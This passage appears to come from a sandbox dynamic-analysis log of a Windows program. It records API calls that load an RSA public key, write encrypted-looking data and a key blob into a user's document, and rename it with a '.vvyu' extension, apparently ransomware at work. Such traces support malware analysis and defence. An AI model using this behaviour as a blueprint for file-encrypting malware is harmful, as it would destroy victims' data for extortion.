KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.267] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.268] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31bca0) returned 1 [0200.270] CryptCreateHash (in: hProv=0x31bca0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0200.270] CryptHashData (hHash=0x2a05d28, pbData=0x2a79478, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.270] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0200.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0200.270] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0200.270] GetLastError () returned 0x0 [0200.270] CryptDestroyHash (hHash=0x2a05d28) returned 1 [0200.270] CryptReleaseContext (hProv=0x31bca0, dwFlags=0x0) returned 1 [0200.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.271] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0200.271] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0200.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.271] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0200.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x116f0) returned 0x2afb168 [0200.272] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a79478 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a057e0 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d4c0 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05828 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b90 [0200.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0200.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0200.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ba8 [0200.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0200.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0200.273] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0200.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0200.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0200.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ba8 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6b30 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x29dcde8 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a197b8 [0200.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26668 [0200.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0200.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0200.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0200.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0200.277] GetCurrentThreadId () returned 0x5d8 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af60b0 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42628 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.277] GetCurrentThreadId () returned 0x5d8 [0200.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x29dcde8 [0200.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0200.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0200.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0200.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7d70 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0200.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0200.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ba8 [0200.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0200.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0200.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0200.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b78 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b60 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7630 [0200.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0200.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf6e0 [0200.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0200.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0200.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2adf8f0 [0200.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x29dcde8 [0200.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a199e8 [0200.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3f88 [0200.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0200.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0200.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0200.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a199e8 | out: hHeap=0x2c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8f0 | out: hHeap=0x2c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42628 | out: hHeap=0x2c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b90 | out: hHeap=0x2c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05828 | out: hHeap=0x2c0000) returned 1 [0200.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0200.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0200.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0200.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0200.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0200.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0200.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0200.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.291] WriteFile (in: hFile=0x52c, lpBuffer=0x2afb168*, nNumberOfBytesToWrite=0x116e6, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2afb168*, lpNumberOfBytesWritten=0x2f9fb14*=0x116e6, lpOverlapped=0x0) returned 1 [0200.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2afb168 | out: hHeap=0x2c0000) returned 1 [0200.292] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x116eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.292] WriteFile (in: hFile=0x52c, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0200.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0200.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0200.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0200.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0200.294] WriteFile (in: hFile=0x52c, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.294] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.294] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.294] CloseHandle (hObject=0x52c) returned 1 [0200.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x2af9180 [0200.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e0) returned 0x2af3f88 [0200.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af9180 | out: hHeap=0x2c0000) returned 1 [0200.297] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\IcyHH4kvUj6MCZmB\\NLDjOHMq5YqJ5Vaq-G-z.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\icyhh4kvuj6mczmb\\nldjohmq5yqj5vaq-g-z.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\IcyHH4kvUj6MCZmB\\NLDjOHMq5YqJ5Vaq-G-z.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\icyhh4kvuj6mczmb\\nldjohmq5yqj5vaq-g-z.pps.vvyu")) returned 1 [0200.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.300] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0200.303] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99035c0, ftCreationTime.dwHighDateTime=0x1d8a564, ftLastAccessTime.dwLowDateTime=0x55058220, ftLastAccessTime.dwHighDateTime=0x1d8a5ce, ftLastWriteTime.dwLowDateTime=0x55058220, ftLastWriteTime.dwHighDateTime=0x1d8a5ce, nFileSizeHigh=0x0, nFileSizeLow=0x116eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NLDjOHMq5YqJ5Vaq-G-z.pps", cAlternateFileName="NLDJOH~1.PPS")) returned 0 [0200.303] FindClose (in: hFindFile=0x2a05e28 | out: hFindFile=0x2a05e28) returned 1 [0200.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2c0000, 